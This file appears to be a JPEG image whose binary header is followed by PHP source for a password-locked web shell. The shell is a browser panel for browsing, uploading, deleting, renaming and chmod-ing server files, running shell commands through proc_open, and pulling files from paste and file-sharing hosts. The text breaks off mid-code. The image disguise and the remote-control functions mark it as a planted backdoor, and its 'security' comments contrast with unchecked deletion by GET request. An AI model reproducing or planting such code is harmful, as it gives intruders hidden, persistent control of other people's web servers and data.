���� JFIF    �� �  ( %"1!%)+...383,7(-.+  -+++--++++---+-+-----+---------------+---+-++7-----��  � �" ��     �� H    !1AQaq"�'�2B����#R"'� Tbr���3cs�'��DS��$C��   �� %  !1AQa"23�'��   ? �� �p���� ��Y��\?�������p���� ��Y��\?�������0���� ��[�� ���i~T�bq�8O�p� �O�O�`�R����i���< Ft�I"'��8�Df���}"'��6  �F�y�j��h����/��:�c� "Y���l>� "��te:q�\o�e�󲍷�HT4&� ���6�������� ��7�i"'�j|"'��>b��S?*��� ���*h���r�� U�S炟[A�a�[����&�j?���+EzP�We��rJFt 'B��χ%#tE �z ��O۫!1���͏��%����]��(�:@<�������t��+��%�Á�h�O�J�tM��>���w3Y��牋4Ǎ���T�>��=�why�,��������a����ѪQ|%6��A �%:�j<>ɗ� �_�Cb������݃|R��c�f溪"'t.С�T� *Ŀ�-{���czů�_�^X���miB[X�d�1,�"zE��& �9g�f�9�'.;��i}!����q��٤�"'����A����e"A$˝�s��� �� �#�x���(l ��3��5m! rt`��0~'j2�(]S��kv,�� l��JA��� J3E8�i�:cɞ�eZ���\�k�(79���:�X"'���&�* �.���(��2����Hi�TF��[���R��䢍mg�.��<��S0����U�f#V�;Ֆ�P@3�o<�-���.L|k���f�6@�eu�|�a�Ɵ�����>��?cK�6�T��"��sĤ�;H2�Rچ�\ַ�n'� �#�I���%�����7��qT�3I���5I7�!�O����������$Tc�'[�ֳ��';A� ���g A�2Z"i�vd��.i���)�]������&�{V�i�"'.���� �?h�Mt���[� �� �V(�}=ibԡ����b L􁥇piη_Z<�z��)i�wi� 2h�3�='d�8�1��c���7��7� �\�)�} �f��pA�L%�c2 ���Qz�;T8s��q�)QFM��X�±N�aF��8�!U  Z�R� �PV���in��-G����ˊ���z�}�����F�}Uw�#�5B�{��}�<�D ���&��Db���M�." ���*�'V�|���gll��klz[����A�b�E� dѻXx9�ܣ�T/`��vI�ݵ�˂"'G��*���r|*}<� @�m�'M�"'.��Y�|6�U�j���qO �kD���5� �;�����G�k \ ���=�=S����S���p��Qű���?��1ѕ�Z�?h� L�l{Y*K���zc���� �+� �-�k��%�E�A'}�><�I�"'bp�/q��voX��w,\���6Z[Xd��@֗�$�J�#�>'�� ���<)4�ry��|�A�n5��y��M�2{"}���l��WX\l���g��O� /��B�f���[.P�Zs��*�T܈�QN��"'���V�(��*e�""5T����F��D�[8'ҥa�ڶk7a *���'ҷ\8��\@\����q+D�r�m΅_�滊Ӝ��'R�9M��D�l�lffc+��,��� ��Ǥ=�'�7����/"����������+�,u�M���bm:��P�{�Gz[���� KH�`�؊���P8Aq.C� ���k�pj�k�N�q��,�N��-�{Z�'��44�s���V�R��m" 6?�D9��T��ꋇ`4�������"'�orqК�Z�x4����u��f���[P ,Q��aX�`P��Z����Y�g �A�x '6L�x��*�Q  �''h� =�,6�#r�<������,�ꕀ a�s�'%�"����B� H�3߰�$"Xn��'�2�Te��x�� ���� �K��{'t�Ϋ�j��Z[ "'�7L�4V�CE�]m��y"�4-dz����x.*��� b��h:���s`BT�R��g⻩�j���sF��J�Fl'ȕX�"'��~*j� +(��6-���G��y�<�'�.�F�H�w(+)����z��T�Fߘ��;DmV�3�u@m��X���3B�����<·�� z,�@�ŷd2]�8s�I�ޯ^�9�u�~�A��4�M? K]���Pl@s_ p:��ZR"'��JC[CS.h���˜��]���wR�k7X�k�'���=������')�71�'c���� `�.{�p��j\�{1h{o��=�U��G֌��-B�m+AZX�� �H��Jm�;�䡟���� �i�g�$�Mk5�L"'��v��� ,=f""���5��x6{ɏ�ID0e�v�mi'�����9$��*£'9� ��Tԅ�>JV�}�}$p[bԮ*[jzS*8 "�T�͖�U�wo$��=LT��~�����$榍q�"+�kFm)���i��qފ���( ��� ���#5����﯅�X���*F#TXJ� u�JV�&=i�s1�3�'f��5�<=[�ޭ �P�;���_~ģ�8r� �w;'hDT�>��G�8���z���q�ZcqJ���-�[ܘbň��b"'��31�n�i���;1��� �X�,�q�$>����Z�Z 1{����+�յ��T$�K]���*��tMI'�Zb��iҘ}b�0��5�� [5�^ݜW���h� �OWun��5 a2Z.G2�YL]j�t�"� ��'%"�<����s��UZv��i��M��.�V���#k��i�̖�)�T[)B��� xB�B��T�.�~�@VĶr#��*"�ZND�H;�i ],����p�(�����T.uC�4@� G��)"Cx��0�#:��F�bR\(����f�4މF�HX��,��E����]�v�?tL�vBY��6�u5�AQ�1'"�x�H�Ї ^ �KwJ�֎5�C��vܫ/B0$�k��=�b�(�)w�A��� 11�=�Q��626��/`G��<}�-�7KEH����Ȥmݱ�����Snm�="'䫚mݱ���~�"�U�J���B|E L�y��jD�$G����7�R8�҅Ǜ WVe#�� p�Fx~�ݤF�0�� K��S<6"'�WШ; �� �ʐ�\�u���ݖVN�k�7o�X�����F���g�� M~��=p,X� ���ŋ'�j�.���� q�Q��ZE���=6�]�� s�>v��^�\wq9r��\��kUR�$�*�Nq?Þ�*!s��:TU_u�T+�X� ���,���BTs�$؛4m椴z�K]'�P� @�#�`��=I�fiV���"nRm+�FPOh�0B� �+�5c v�:P'�y� �V~�ӆ�u�kDoh$�\*�%Ю=���aȼ���.-�V���'ly�1�3�#�E��S�gV�m�=�\�"�WU��Ǽ� �n�G�� ��N D�õN���;H�y�ȩP��{:?R'"Ԩ�F���b�� JS�|�R�iv�����賴Iئ�T!���ت���@q�wn�CW�@JU��m6]�:��x'"�+��XvӦ�m=��7� $�"B�~�p%՟U�� N@���~w����5��'�e��5�//��~�T���7��#�� �� p�$�e��*�ӊE�WE�s�g ��v�SsLp��W��EW���H; ��!CY�Z ��f �#1W. \uW�\,\�f j'<qTb�n��[vxx�� '��1���M�P� H)���A7s,|�F" ��k�9��*"��;�!�$Ei�������������S��$'N��z�5r����D���!����&@m��^��d q5Ln� N;.6��N|#�"1N�x"�<3('&��t �~��u"1Tb㫨9ꖛ�b�d$ߣ=#���mU�e�$EF�5ýY�������Ǘ�ssM]��0��JRӪ�i�+O58���x" \����i"'�i �� " M+M��9��A��Q����K~��'g�ִ~��[3GU�ҽ#�k�Ԯ�"'��dWV�IP��8u�"E �qLj���CB�{A^��;��`���� ˼ �t��.tƐm*n�y4o&�x�n���aup��j8�m���!o�;�0y^��^Eѿ�jz��)v��nÄL �^��� ���3k ���h�]i����*����� C�j�j�zn�� �#b'F� �v�''�'T��H��%M� �&�nj�1 ' �� �i�s ��R-��k���7:� 0����/a٬��#��� �aiVc�. ���" �Yg��������f�7�h᷸�}&D9��sə�����C���bFC|��(����-%�'a ̿)��n��� ގX�4��H^��'�@��Eh�"L8�j� ���V��R��5u� V4lZ��=�x����� �"���__yM1t�?u��Ik�g�@�[���X�J�j�:nkŢu '}�Gz��/I�芬�48q�F��R�=��{���R�icS �۠�Nt���£,w4r�쮻~x(�U���#�&�դ>����9'�{9eV�[�j��u]��2�qњ�J�0�sÄ|���0�"b�>"{�_F`ة��:��,v���fc1�"�����n1#=� ��v~H���A���܀Ӛ]�; �I���Qi��9yw�KG��� zQY�����Z07�X� �h;�M)i�CH-�T'�|A0{��LږT��k�'d�"rmm�"جPF��cbE�T��x��K���'Ӯ7��(\4��øUu@j�yĵ;��!��b.W�=m����K k �K^��#p*�14qkZ�5�� ��5�%��<���ԥ�C մ��$��""٬q��[4��!�ϗ�b쳐X�A��~`��r�8������<�>���?xs���� /�;����ș�{"@��z�[�߂�U_<ǟ�4�N��61�q�u ��F����J_���~ �A�݄ϗr�D;xT�"'�`ɫ�su��O`?���� L�#�c5�o�؂y����ZR�<&J�+������i!��0�Ao��L��-2��W.'t^�(K�mH�V@x��y������^:�3w� 7����⹮:',�M��n��+�b� L�'�nR���%�����Q:�f��"P�t���c�l�&�ژ�kv��+�v��,=�v�6�Xy*��t��<�:"a����ϲ=�6rO]XI����zڭ�� 6�"w\d �~v���k�^m<� ���\)����;��l���E��cѾ@vnM�,�"�Bx��z���%3�"}����> B��;�]V+P�F_���> ؚe|��OmF�� �q�$/x�x�z`�9�""�ij�!7.\Td�9M��i���'50ގn���4��O �*�^�Q�����8=��s�'�뙫�%P�[O ��P�V�s��.�,kc� �A9n�X�-ޚN["�QՉ�M����XJ��aLj���m��ڠu����Q��� /�Ux:���' Đ���3V���n�6�*��K���c �U��hs��j��j#,�m�R��lb�UT��8��0��r`�� Ї �"�� � �6� f� ��oܱԷ-<��)�a��'ڻ�TXq���Y�Hy�9�IW�Y�uMF� ��'Aq�4�/� ���'i$��=� �|�K�4�0�|�6p'0�)o�ct�H+CA-" x�|�X��� l8���3�:���KX�U�� $item, 'path' => $full, 'is_dir' => is_dir($full), 'size' => is_file($full) ? filesize($full) : '-', 'mtime' => filemtime($full) ]; if (is_dir($full)) $dirs[] = $info; else $files[] = $info; } // Add parent directory navigation if not at root $current_path_real = realpath($path); $parent_path = dirname($path); // Don't show parent if we're at system root or user home root if ($current_path_real !== '/' && $current_path_real !== $user_home && $parent_path !== $current_path_real) { array_unshift($dirs, [ 'name' => '..', 'path' => $parent_path, 'is_dir' => true, 'size' => '-', 'mtime' => filemtime($parent_path) ]); } return array_merge($dirs, $files); } function formatSize($b) { if (!is_numeric($b)) return '-'; if ($b >= 1073741824) return round($b / 1073741824, 2) . ' GB'; if ($b >= 1048576) return round($b / 1048576, 2) . ' MB'; if ($b >= 1024) return round($b / 1024, 2) . ' KB'; return $b . ' B'; } function perms($file) { $p = @fileperms($file); if ($p === false) return '---------'; return ($p & 0x4000 ? 'd' : '-') . (($p & 0x0100) ? 'r' : '-') . (($p & 0x0080) ? 'w' : '-') . (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')) . (($p & 0x0020) ? 'r' : '-') . (($p & 0x0010) ? 'w' : '-') . (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')) . (($p & 0x0004) ? 'r' : '-') . (($p & 0x0002) ? 'w' : '-') . (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); } function perms_to_octal($perms) { return substr(sprintf('%o', $perms), -4); } function breadcrumbs($path, $self_filename) { global $user_home, $document_root; // Special handling for home directory if ($path === $user_home) { return "/ / home"; } // Start with root $out = ["/"]; // If we're under home, show home in breadcrumb if (strpos($path, $user_home) === 0) { $out[] = "home"; $relative_path = substr($path, strlen($user_home) + 1); $parts = explode('/', trim($relative_path, '/')); $full = $user_home; } else { $parts = explode(DIRECTORY_SEPARATOR, trim($path, DIRECTORY_SEPARATOR)); $full = ''; } foreach ($parts as $part) { if (empty($part)) continue; $full .= '/' . $part; $out[] = "" . htmlspecialchars($part, ENT_QUOTES, 'UTF-8') . ""; } return implode(" / ", $out); } function deleteRecursive($path) { if (!file_exists($path)) return false; // Ensure we have permission to delete if (!is_writable($path)) { // Try to change permissions if possible @chmod($path, 0644); if (is_dir($path)) { @chmod($path, 0755); } } if (is_file($path)) return unlink($path); elseif (is_dir($path)) { $items = array_diff(scandir($path), ['.', '..']); foreach ($items as $item) { if (!deleteRecursive($path . DIRECTORY_SEPARATOR . $item)) { return false; } } return rmdir($path); } return false; } function createZipFromItems($items_to_zip, $destination_zip_file, $base_dir) { if (!extension_loaded('zip')) { error_log("ZIP extension not loaded."); return false; } $zip = new ZipArchive(); if (!$zip->open($destination_zip_file, ZIPARCHIVE::CREATE | ZIPARCHIVE::OVERWRITE)) { error_log("Failed to open zip archive: " . $destination_zip_file); return false; } $success_count = 0; foreach ($items_to_zip as $item_path_encoded) { $item_path = realpath(urldecode($item_path_encoded)); if ($item_path === false || !file_exists($item_path)) { error_log("Item not found or invalid path: " . $item_path_encoded); continue; } if (strpos($item_path, realpath($base_dir)) !== 0) { error_log("Attempted to zip file outside current directory: " . $item_path); continue; } $base_dir_real = realpath($base_dir); $relativePath = substr($item_path, strlen($base_dir_real) + 1); if (is_file($item_path)) { if ($zip->addFile($item_path, $relativePath)) { $success_count++; } else { error_log("Failed to add file to zip: " . $item_path); } } elseif (is_dir($item_path)) { $zip->addEmptyDir($relativePath . '/'); $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($item_path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $entryName = $relativePath . '/' . substr($filePath, strlen($item_path) + 1); if ($zip->addFile($filePath, $entryName)) { $success_count++; } else { error_log("Failed to add directory file to zip: " . $filePath); } } } } } $zip->close(); return $success_count; } // More secure command execution with better validation function executeCommand($cmd, $cwd) { if (!function_exists('proc_open')) { return "
Error: Function proc_open() is disabled on this server. Cannot execute commands.
"; } // Enhanced security for command execution $allowed_commands = ['ls', 'dir', 'pwd', 'whoami', 'date', 'uname', 'df', 'du', 'chmod']; $cmd_parts = explode(' ', trim($cmd)); $base_cmd = $cmd_parts[0]; if (!in_array($base_cmd, $allowed_commands)) { return "
Error: Command '$base_cmd' is not allowed for security reasons.
"; } // Additional validation for command parameters foreach ($cmd_parts as $part) { if (strpos($part, ';') !== false || strpos($part, '&&') !== false || strpos($part, '||') !== false) { return "
Error: Command chaining is not allowed for security reasons.
"; } } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); // Set environment variables for security $env = [ 'PATH' => '/usr/bin:/bin', 'SHELL' => '/bin/sh', 'HOME' => $cwd ]; $process = @proc_open($cmd, $descriptorspec, $pipes, $cwd, $env); if (is_resource($process)) { fclose($pipes[0]); $stdout = stream_get_contents($pipes[1]); fclose($pipes[1]); $stderr = stream_get_contents($pipes[2]); fclose($pipes[2]); $return_value = proc_close($process); return "
\n" . htmlspecialchars($stdout, ENT_QUOTES, 'UTF-8') . "\nError:\n" . htmlspecialchars($stderr, ENT_QUOTES, 'UTF-8') . "\nExit Code: " . htmlspecialchars($return_value, ENT_QUOTES, 'UTF-8') . "
"; } else { $last_error = error_get_last(); return "
Error: Could not open process. " . ($last_error ? htmlspecialchars($last_error['message'], ENT_QUOTES, 'UTF-8') : 'Unable to start external process.') . "
"; } } function copyRecursive($source, $dest) { if (is_file($source)) { return copy($source, $dest); } elseif (is_dir($source)) { @mkdir($dest, 0755, true); $items = array_diff(@scandir($source) ?: [], ['.', '..']); foreach ($items as $item) { if (!copyRecursive($source . DIRECTORY_SEPARATOR . $item, $dest . DIRECTORY_SEPARATOR . $item)) { return false; } } return true; } return false; } // Enhanced URL content fetching with better security function getUrlContent($url) { if (!extension_loaded('curl')) { error_log("cURL extension not loaded."); return false; } // Validate URL for security if (!filter_var($url, FILTER_VALIDATE_URL)) { error_log("Invalid URL: " . $url); return false; } // More strict URL validation $parsed_url = parse_url($url); $host = isset($parsed_url['host']) ? $parsed_url['host'] : ''; $scheme = isset($parsed_url['scheme']) ? $parsed_url['scheme'] : ''; // Only allow http and https schemes if (!in_array($scheme, ['http', 'https'])) { error_log("Invalid URL scheme: " . $scheme); return false; } // Whitelist of allowed domains $allowed_domains = [ 'github.com', 'raw.githubusercontent.com', 'pastebin.com', 'gitlab.com', 'bitbucket.org', 'sourceforge.net', 'drive.google.com', 'dropbox.com', 'mediafire.com', '4shared.com', 'zippyshare.com', 'mega.nz' ]; // Check if domain is in whitelist if (!empty($host) && !in_array($host, $allowed_domains)) { error_log("Domain not in whitelist: " . $host); return false; } $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => true, // Enabled for security CURLOPT_SSL_VERIFYHOST => 2, // Enabled for security CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36', CURLOPT_TIMEOUT => 30, // Reduced timeout CURLOPT_MAXREDIRS => 5, // Reduced max redirects CURLOPT_MAXFILESIZE => MAX_FILE_SIZE, // Limit file size ]); $data = curl_exec($ch); if (curl_errno($ch)) { error_log("cURL error: " . curl_error($ch)); $data = false; } curl_close($ch); return $data; } // Sanitize filename to prevent security issues function sanitize_filename($filename) { // Remove potentially dangerous characters $filename = preg_replace('/[^\w\.-]/', '_', $filename); // Prevent directory traversal $filename = str_replace('../', '', $filename); $filename = str_replace('..\\', '', $filename); // Limit filename length if (strlen($filename) > 255) { $filename = substr($filename, 0, 255); } return $filename; } // Handle lock file for authentication if (file_exists($lock_file) && !isset($_SESSION['unlocked'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['pass'])) { $hash = file_get_contents($lock_file); if (password_verify($_POST['pass'], $hash)) { $_SESSION['unlocked'] = true; session_regenerate_id(true); // Security for session header("Location: ?d=" . urlencode($cwd)); exit; } else { $msg = "Invalid password"; } } echo << Authentication Required HTML; if (!empty($msg)) { echo ""; } exit; } // Generate CSRF token for security if (empty($_SESSION['csrf_token'])) { $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); } $csrf_token = $_SESSION['csrf_token']; // Action Handlers if ($_SERVER['REQUEST_METHOD'] === 'POST') { // Validate CSRF token if (!isset($_POST['csrf_token']) || !hash_equals($_POST['csrf_token'], $_SESSION['csrf_token'])) { die("CSRF token validation failed."); } // Handle file upload with enhanced security if (isset($_POST['uploadfile'])) { // Debug information error_log("Upload attempt to directory: " . $cwd); error_log("Current user: " . get_current_user()); error_log("Directory owner: " . (function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($cwd))['name'] : 'Unknown')); error_log("Directory permissions: " . substr(sprintf('%o', fileperms($cwd)), -4)); error_log("Directory writable: " . (is_writable($cwd) ? 'Yes' : 'No')); // Check if directory is writable if (!is_writable($cwd)) { error_log("Directory is not writable, attempting to fix permissions"); // Try to fix directory permissions if (!ensureDirectoryWritable($cwd)) { error_log("Failed to make directory writable"); header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Upload failed: Directory is not writable and permissions could not be changed. Please check directory permissions or contact your hosting provider.")); exit; } } if (isset($_FILES['uploadfile']) && $_FILES['uploadfile']['error'] === UPLOAD_ERR_OK) { // Check file size if ($_FILES['uploadfile']['size'] > MAX_FILE_SIZE) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Upload failed: File size exceeds the maximum allowed size.")); exit; } // Get file information $file_info = pathinfo($_FILES['uploadfile']['name']); $file_extension = strtolower($file_info['extension']); // Check if extension is allowed if (!in_array($file_extension, ALLOWED_EXTENSIONS)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Upload failed: File type not allowed.")); exit; } // Sanitize filename $safe_filename = sanitize_filename(basename($_FILES['uploadfile']['name'])); $dest = $cwd . '/' . $safe_filename; // Check if file already exists if (file_exists($dest)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Upload failed: File already exists.")); exit; } // Debug information error_log("Upload temp file: " . $_FILES['uploadfile']['tmp_name']); error_log("Upload destination: " . $dest); error_log("Temp file exists: " . (file_exists($_FILES['uploadfile']['tmp_name']) ? 'Yes' : 'No')); error_log("Temp file readable: " . (is_readable($_FILES['uploadfile']['tmp_name']) ? 'Yes' : 'No')); // Try to upload file using multiple methods $upload_success = false; $error_msg = "Failed to move file. Check directory permissions."; // Method 1: Standard move_uploaded_file if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $dest)) { $upload_success = true; error_log("Upload successful with move_uploaded_file"); } else { error_log("move_uploaded_file failed, trying alternative methods"); // Method 2: Copy then delete if (copy($_FILES['uploadfile']['tmp_name'], $dest)) { unlink($_FILES['uploadfile']['tmp_name']); $upload_success = true; error_log("Upload successful with copy+unlink"); } else { error_log("copy+unlink failed, trying file_get_contents+file_put_contents"); // Method 3: Read and write file contents $content = file_get_contents($_FILES['uploadfile']['tmp_name']); if ($content !== false) { if (file_put_contents($dest, $content) !== false) { unlink($_FILES['uploadfile']['tmp_name']); $upload_success = true; error_log("Upload successful with file_get_contents+file_put_contents"); } else { $error_msg = "Failed to write file to destination. Check disk space and permissions."; } } else { $error_msg = "Failed to read uploaded file. Check upload_tmp_dir and permissions."; } } } if ($upload_success) { // Set file permissions @chmod($dest, 0644); header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Upload successful")); } else { // Get more detailed error information $last_error = error_get_last(); if ($last_error) { $error_msg .= " Server error: " . $last_error['message']; } // Check for common issues if (!is_dir($cwd)) { $error_msg = "Target directory does not exist."; } elseif (!file_exists($_FILES['uploadfile']['tmp_name'])) { $error_msg = "Temporary upload file not found. Check upload_tmp_dir in php.ini."; } elseif (disk_free_space($cwd) < $_FILES['uploadfile']['size']) { $error_msg = "Not enough disk space in target directory."; } error_log("Upload failed: " . $error_msg); header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Upload failed: " . $error_msg)); } } else { $upload_error_msg = "Unknown error."; switch ($_FILES['uploadfile']['error']) { case UPLOAD_ERR_INI_SIZE: $upload_error_msg = "File size exceeds upload_max_filesize limit in php.ini."; break; case UPLOAD_ERR_FORM_SIZE: $upload_error_msg = "File size exceeds MAX_FILE_SIZE limit specified in HTML form."; break; case UPLOAD_ERR_PARTIAL: $upload_error_msg = "File was only partially uploaded."; break; case UPLOAD_ERR_NO_FILE: $upload_error_msg = "No file was uploaded."; break; case UPLOAD_ERR_NO_TMP_DIR: $upload_error_msg = "Temporary folder is missing."; break; case UPLOAD_ERR_CANT_WRITE: $upload_error_msg = "Failed to write file to disk."; break; case UPLOAD_ERR_EXTENSION: $upload_error_msg = "A PHP extension stopped the file upload."; break; } header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Upload failed: " . $upload_error_msg)); } exit; } // Handle create new file if (isset($_POST['newfile'])) { $filename = sanitize_filename($_POST['newfile']); $filedata = $_POST['filedata'] ?? ''; // Validate filename if (empty($filename)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Invalid filename. Only alphanumeric characters, hyphens, and underscores are allowed.")); exit; } $filepath = $cwd . '/' . $filename; // Check if file already exists if (file_exists($filepath)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("File already exists.")); exit; } if (file_put_contents($filepath, $filedata) !== false) { // Set file permissions @chmod($filepath, 0644); header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("File created successfully")); } else { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Failed to create file")); } exit; } // Handle create new folder if (isset($_POST['newfolder'])) { $foldername = sanitize_filename($_POST['newfolder']); // Validate folder name if (empty($foldername)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Invalid folder name. Only alphanumeric characters, hyphens, and underscores are allowed.")); exit; } $folderpath = $cwd . '/' . $foldername; // Check if folder already exists if (file_exists($folderpath)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Folder already exists.")); exit; } if (mkdir($folderpath, 0755)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Folder created successfully")); } else { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Failed to create folder")); } exit; } // Handle rename if (isset($_POST['rename_submit'])) { $old_path = $_POST['old_path_rename']; $new_name = sanitize_filename($_POST['new_name']); // Validate new name if (empty($new_name)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Invalid name. Only alphanumeric characters, hyphens, underscores, and dots are allowed.")); exit; } // Validate old path $old_path_real = realpath($old_path); if ($old_path_real === false) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Invalid old path.")); exit; } // Make sure old path is within current working directory $cwd_real = realpath($cwd); if (strpos($old_path_real, $cwd_real) !== 0) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Old path is outside the allowed directory.")); exit; } $new_path = dirname($old_path_real) . '/' . $new_name; // Make sure new path is within current working directory if (strpos(realpath(dirname($new_path)), $cwd_real) !== 0) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("New path is outside the allowed directory.")); exit; } // Check if destination already exists if (file_exists($new_path)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Destination already exists.")); exit; } if (rename($old_path_real, $new_path)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Rename successful")); } else { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Failed to rename. Check permissions.")); } exit; } // Handle chmod if (isset($_POST['set_chmod'])) { $path = $_POST['chmod_path']; $octal = $_POST['chmod_octal']; // Validate octal format if (!preg_match('/^[0-7]{3,4}$/', $octal)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Invalid permission format")); exit; } // Validate path $path_real = realpath($path); if ($path_real === false) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Invalid path.")); exit; } // Make sure path is within current working directory $cwd_real = realpath($cwd); if (strpos($path_real, $cwd_real) !== 0) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Path is outside the allowed directory.")); exit; } if (chmod($path_real, octdec($octal))) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Permissions changed successfully")); } else { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Failed to change permissions. Check permissions.")); } exit; } // Handle delete if (isset($_GET['delete'])) { $item = $_GET['delete']; // Make sure item exists if (!file_exists($item)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("File or folder not found")); exit; } // Make sure we have permission to delete if (!is_writable($item)) { // Try to change permissions if (is_file($item)) { @chmod($item, 0644); } else { @chmod($item, 0755); } } if (deleteRecursive($item)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Delete successful")); } else { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Failed to delete. Check permissions.")); } exit; } // Handle batch actions if (isset($_POST['batch_action']) && isset($_POST['selected_items']) && is_array($_POST['selected_items'])) { $action = $_POST['batch_action']; $items = $_POST['selected_items']; switch ($action) { case 'delete': $success = true; $error_count = 0; foreach ($items as $item) { $item_path = urldecode($item); if (!file_exists($item_path)) { $error_count++; continue; } // Make sure we have permission to delete if (!is_writable($item_path)) { // Try to change permissions if (is_file($item_path)) { @chmod($item_path, 0644); } else { @chmod($item_path, 0755); } } if (!deleteRecursive($item_path)) { $success = false; $error_count++; } } $msg = $success ? "Successfully deleted selected items" : "Failed to delete $error_count items"; break; case 'zip': $zip_name = 'archive_' . date('YmdHis') . '.zip'; $zip_path = $cwd . '/' . $zip_name; $count = createZipFromItems($items, $zip_path, $cwd); $msg = "Successfully created archive: $zip_name ($count files)"; break; case 'copy': $_SESSION['clipboard_items'] = array_map('urldecode', $items); $_SESSION['clipboard_type'] = 'copy'; $msg = count($items) . " items copied to clipboard"; break; case 'cut': $_SESSION['clipboard_items'] = array_map('urldecode', $items); $_SESSION['clipboard_type'] = 'cut'; $msg = count($items) . " items cut to clipboard"; break; } header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode($msg)); exit; } // Handle paste if (isset($_POST['paste_item']) && !empty($clipboard_items)) { $success = true; $error_count = 0; foreach ($clipboard_items as $item) { $item_name = basename($item); $dest_path = $cwd . '/' . sanitize_filename($item_name); // Check if destination already exists if (file_exists($dest_path)) { $error_count++; continue; } if ($clipboard_type === 'copy') { if (!copyRecursive($item, $dest_path)) { $success = false; $error_count++; } } elseif ($clipboard_type === 'cut') { if (!rename($item, $dest_path)) { $success = false; $error_count++; } } } if ($clipboard_type === 'cut' && $success) { $_SESSION['clipboard_items'] = []; $_SESSION['clipboard_type'] = null; } $msg = $success ? "Successfully pasted items" : "Failed to paste $error_count items"; header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode($msg)); exit; } // Handle set password if (isset($_POST['setpass'])) { $password = $_POST['setpass']; if (!empty($password)) { $hash = password_hash($password, PASSWORD_DEFAULT); if (file_put_contents($lock_file, $hash) !== false) { $_SESSION['unlocked'] = true; header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Password set successfully")); } else { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Failed to save password")); } } else { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Password cannot be empty")); } exit; } // Handle delete password if (isset($_POST['delpass'])) { if (file_exists($lock_file) && unlink($lock_file)) { unset($_SESSION['unlocked']); header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Password deleted successfully")); } else { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Failed to delete password")); } exit; } // Handle command execution if (isset($_POST['cmd_exec']) && isset($_POST['command'])) { $cmd = $_POST['command']; $output = executeCommand($cmd, $cwd); // Save command history if (!isset($_SESSION['cmd_history'])) { $_SESSION['cmd_history'] = []; } $_SESSION['cmd_history'][] = $cmd; $_SESSION['cmd_history'] = array_slice($_SESSION['cmd_history'], -10); // Save max 10 history $encoded_output = urlencode($output); header("Location: ?action=cmd&d=" . urlencode($cwd) . "&cmd_output=" . $encoded_output); exit; } // Handle clear command history if (isset($_POST['clear_cmd_history'])) { unset($_SESSION['cmd_history']); header("Location: ?action=cmd&d=" . urlencode($cwd)); exit; } // Handle download and save from URL if (isset($_POST['download_url_and_save'])) { $url = $_POST['url_to_download_raw']; $filename = sanitize_filename($_POST['filename_to_save']); // Validate filename if (empty($filename)) { header("Location: ?action=cmd&d=" . urlencode($cwd) . "&msg=" . urlencode("Invalid filename. Only alphanumeric characters, hyphens, underscores, and dots are allowed.")); exit; } $content = getUrlContent($url); if ($content !== false) { $filepath = $cwd . '/' . $filename; // Check if file already exists if (file_exists($filepath)) { header("Location: ?action=cmd&d=" . urlencode($cwd) . "&msg=" . urlencode("File already exists.")); exit; } if (file_put_contents($filepath, $content) !== false) { // Set file permissions @chmod($filepath, 0644); header("Location: ?action=cmd&d=" . urlencode($cwd) . "&msg=" . urlencode("File 